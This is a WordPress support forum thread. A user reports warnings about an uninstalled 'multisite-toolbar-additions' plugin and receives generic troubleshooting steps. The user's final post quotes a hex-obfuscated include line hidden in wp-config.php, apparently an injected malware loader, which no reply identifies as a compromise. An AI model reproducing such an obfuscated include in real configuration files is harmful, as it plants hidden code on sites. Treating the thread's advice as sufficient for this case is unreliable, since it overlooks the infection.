Access your server via FTP/ SFTP , or a file manager in your hosting account’s control panel (consult your hosting provider’s documentation for specifics on these), navigate to /wp-content/plugins/ and delete multisite-toolbar-additions plugin

    Thanks t-p for quick response.
    I couldn’t find that plug-in my FTP under wp-content/plugins ?

I don’t recollect installing it as a plugin also.
    Any thoughts ?

The error message you posted indicates that particular plugin to be the error.

If that plugin already deleted, try Flushing any caching plugins you might be running, as well as server and/or browser caches. Not just your browser, but any op cache or content network cache as well such as Cloudflare.

Thanks, tried that. But the two warnings are not going off !
I also searched for multisite-toolbar-additions to add as a new plugina and check, but that doesn’t come up when I try to search for it under ‘New Plugin’

Try manually resetting your plugins (no Dashboard access required). If that resolves the issue, reactivate each one individually until you find the cause.

Unfortunately that option too doesn’t seem to work ??
Do I need to redirect any file from wp-content/plugin to wp-include ?

If that does not resolve the issue, access your server via SFTP or FTP, or a file manager in your hosting account’s control panel, navigate to /wp-content/themes/ and rename the directory of your currently active theme. This will force the default theme to activate and hopefully rule-out a theme-specific issue (theme functions can interfere like plugins).

    Still no luck
This tutorial seem to be close to my problem but still not able to help me with resolution

The main problem is I can’t find where this multisite toolbar plugin is in my code.
I am pretty sure I never got it installed.

    Any workaround suggestions,please?

Also I tried inserting the code to hide PHP errors , even that is not working.

The Line 20 in Code says something like this.. I am not sure if the one’s I have highlighted is what is causing the problem ?

    This file has the following*/

      \x2fvar\x2fchr\x6fot/x6folb\x61r-a\x64dit\x69ons\x2flib\x2ephp”;/

    * configurations: MySQL settings, Table Prefix,
    * Secret Keys, WordPress Language, and ABSPATH. You can find more information
    * by visiting {@link https://codex.www.ads-software.com/Editing_wp-config.php Editing
    * wp-config.php} Codex page. You can get the MySQL settings from your web host.

    Please help
